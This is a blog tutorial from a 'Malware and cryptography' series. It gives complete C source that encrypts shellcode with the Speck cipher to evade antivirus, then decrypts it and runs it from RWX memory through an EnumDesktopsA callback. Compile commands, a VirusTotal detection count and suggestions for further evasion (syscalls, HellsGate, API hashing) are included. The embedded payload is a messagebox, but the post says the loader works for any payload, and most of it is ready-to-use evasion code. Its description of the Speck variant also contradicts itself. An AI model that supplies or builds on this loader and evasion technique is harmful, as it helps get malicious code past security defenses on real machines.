Malware and cryptography 42 - encrypt/decrypt payload via Speck cipher. Simple C example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
In this post, I continue my exploration of symmetric-key block ciphers for encrypting and decrypting payloads to evade antivirus (AV) detection. Previously, I delved into various algorithms like LOKI, Khufu, and Camellia. Today, I focus on the Speck cipher, a lightweight block cipher developed by the NSA, known for its simplicity and efficiency, making it suitable for resource-constrained environments.
Speck Cipher
Speck is a family of lightweight block ciphers designed for optimal performance in software implementations. It operates on a Feistel-like structure with simple operations: addition, rotation, and XOR
(ARX
). Speck supports various block and key sizes; in this example, we’ll use Speck128/128
, which has a block size of 128
bits and a key size of 128
bits
practical example 1
First of all, let’s implement Speck128/128
in C to encrypt and decrypt a block.
We need some constants and keys setup:
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
Also, we need bit rotation helpers:
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
This functions perform left/right 64-bit
circular shifts.
Then we need key schedule logic:
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
As you can see, logic is simple: initializes round keys using the provided 128-bit
key and each round key is derived using rotation, addition, and XOR
After this, working on encryption logic. We need to rotate and mix left and right halves (x, y
) with round key in every round. (27
times in my case):
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
In decryption function just reverse the encryption steps:
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
As you can see, just process rounds in reverse order with inverse operations.
Full source code is looks like this hack.c
:
/*
* hack.c
* encrypt/decrypt via Speck
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/05/29/malware-cryptography-42.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
int main() {
unsigned char payload[] =
"\x6d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x2d\x00";
printf("original: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
speck_key_schedule();
uint64_t* pt = (uint64_t*)payload;
speck_encrypt(&pt[0], &pt[1]);
printf("encrypted: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
speck_decrypt(&pt[0], &pt[1]);
printf("decrypted: ");
for (int i = 0; i < BLOCK_SIZE; i++) printf("%02x ", payload[i]);
printf("\n");
return 0;
}
Print everything for demo and debugging purposes.
demo 1
Let’s go to see everything in action. Compile it (in my linux
machine):
gcc -o hack hack.c
Then run it:
./hack
As you can see everything is worked perfectly! =^..^=
practical example 2
Let’s implement Speck128/128
in C to encrypt and decrypt a payload. The payload is 312
bytes long. This is a multiple of 16
, so it can be encrypted in 128-bit
(16-byte
) blocks using the Speck
algorithm without padding.
Everything is the same as in the previous example, the only difference is:
add encryption of payload by blocks via Speck
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
output of encrypted payload:
printf("encrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n\n");
decryption for verification
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
run shellcode via EnumDesktopsA:
printf("decrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
LPVOID mem = VirtualAlloc(NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, payload, payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
The full source code for this example is looks like this hack2.c
:
/*
* hack2.c
* encrypt/decrypt payload via Speck
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2025/05/29/malware-cryptography-42.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>
#define ROUNDS 27
#define BLOCK_SIZE 16
uint64_t key[2] = {0x1918111009080100, 0x1110980801000908};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
round_keys[0] = key[0];
uint64_t b = key[1];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
int main() {
unsigned char payload[] = {
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};
int payload_len = sizeof(payload);
speck_key_schedule();
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
printf("encrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
printf("\n\n");
for (int i = 0; i < payload_len; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)&payload[i], (uint64_t*)&payload[i+8]);
}
printf("decrypted: \n");
for (int i = 0; i < payload_len; i++) {
printf("%02x ", payload[i]);
if ((i + 1) % 16 == 0) printf("\n");
}
LPVOID mem = VirtualAlloc(NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(mem, payload, payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
As usual, meow-meow
messagebox payload used here:
unsigned char payload[] = {
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,
0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,
0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,
0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,
0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,
0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,
0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,
0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,
0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,
0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,
0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,
0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,
0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0x1a,0x01,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x25,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,
0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x4d,0x65,0x6f,0x77,0x2d,0x6d,0x65,0x6f,0x77,
0x21,0x00,0x3d,0x5e,0x2e,0x2e,0x5e,0x3d,0x00
};
demo 2
Let’s go to see everything in action. Cross-compile it (in my linux
machine):
x86_64-w64-mingw32-g++ hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
Then run it:
.\hack2.exe
As you can see everything is worked perfectly! =^..^=
Upload to VirusTotal:
So, 25 of of 71 AV engines detect our file as malicious. Because our hack2.exe
malware used well known shellcode launching technique.
For better result we can use syscalls, HellsGate techniques, function call obfuscation, hashing WINAPI functions etc, etc.
practical example 3
What about if payload size is not a multiple of 16? In this case we need padding. Here’s the implementation of the Speck cipher, including key schedule, encryption, decryption, and padding logic:
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#define ROUNDS 32
#define BLOCK_SIZE 16 // 128 bits
uint64_t key[2] = {0x1b1a191813121110, 0x0b0a090803020100};
uint64_t round_keys[ROUNDS];
uint64_t rol(uint64_t x, int r) {
return (x << r) | (x >> (64 - r));
}
uint64_t ror(uint64_t x, int r) {
return (x >> r) | (x << (64 - r));
}
void speck_key_schedule() {
uint64_t b = key[1];
round_keys[0] = key[0];
for (int i = 0; i < ROUNDS - 1; i++) {
b = (ror(b, 8) + round_keys[i]) ^ i;
round_keys[i + 1] = rol(round_keys[i], 3) ^ b;
}
}
void speck_encrypt(uint64_t* x, uint64_t* y) {
for (int i = 0; i < ROUNDS; i++) {
*x = (ror(*x, 8) + *y) ^ round_keys[i];
*y = rol(*y, 3) ^ *x;
}
}
void speck_decrypt(uint64_t* x, uint64_t* y) {
for (int i = ROUNDS - 1; i >= 0; i--) {
*y = ror(*y ^ *x, 3);
*x = rol((*x ^ round_keys[i]) - *y, 8);
}
}
void pad_payload(unsigned char** payload, int* length) {
int pad_len = BLOCK_SIZE - (*length % BLOCK_SIZE);
if (pad_len == 0) pad_len = BLOCK_SIZE;
*payload = realloc(*payload, *length + pad_len);
memset(*payload + *length, 0x90, pad_len); // NOP padding
*length += pad_len;
}
void encrypt_payload(unsigned char* payload, int length) {
for (int i = 0; i < length; i += BLOCK_SIZE) {
speck_encrypt((uint64_t*)(payload + i), (uint64_t*)(payload + i + 8));
}
}
void decrypt_payload(unsigned char* payload, int length) {
for (int i = 0; i < length; i += BLOCK_SIZE) {
speck_decrypt((uint64_t*)(payload + i), (uint64_t*)(payload + i + 8));
}
}
void print_payload(const char* label, unsigned char* payload, int length) {
printf("%s: ", label);
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
}
int main() {
unsigned char shellcode[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int length = sizeof(shellcode) - 1;
unsigned char* payload = malloc(length);
memcpy(payload, shellcode, length);
speck_key_schedule();
printf("original payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
pad_payload(&payload, &length);
encrypt_payload(payload, length);
printf("encrypted payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
decrypt_payload(payload, length);
printf("decrypted payload\n");
for (int i = 0; i < length; i++) {
printf("\\x%02x", payload[i]);
}
printf("\n");
// execute the decrypted payload
LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, payload, length);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
free(payload);
return 0;
}
demo 3
Let’s check last example. For simplicity, just check in linux
first (comment lines with windows functions), compile:
gcc -o hack3 hack3.c
run:
./hack3
As you can see padding is worked! =^..^=
You can use it for any payload!
The Speck algorithm I’ve implemented is a correct (but simplified, educational) version of Speck, my code correctly implements the core Speck operations: modular addition, bitwise XOR
, and circular rotations (using rol
and ror
), the speck_key_schedule
function implements a standard Speck key schedule, generating round keys based on the initial key. Also the speck_encrypt
and speck_decrypt
functions follow the standard Speck round structure,
But some important caveats in my code:
My implementation represents Speck-128/256
(128-bit
block, 256-bit
key), as indicated by the 64-bit
words and two 64-bit
key words. As you can see the key schedule and number of rounds (27
) match the specific Speck
variant. Speck
has other variations (e.g., Speck-64/128
, Speck-32/64
) with different block and key sizes.
I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal and C/C++
programmers.
I often wrote about the results of my research here and at various conferences like BlackHat and BSides, and many emails and messages come with various questions. I try to answer questions and consider problems that are interesting to my readers.
Run shellcode via EnumDesktopsA
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine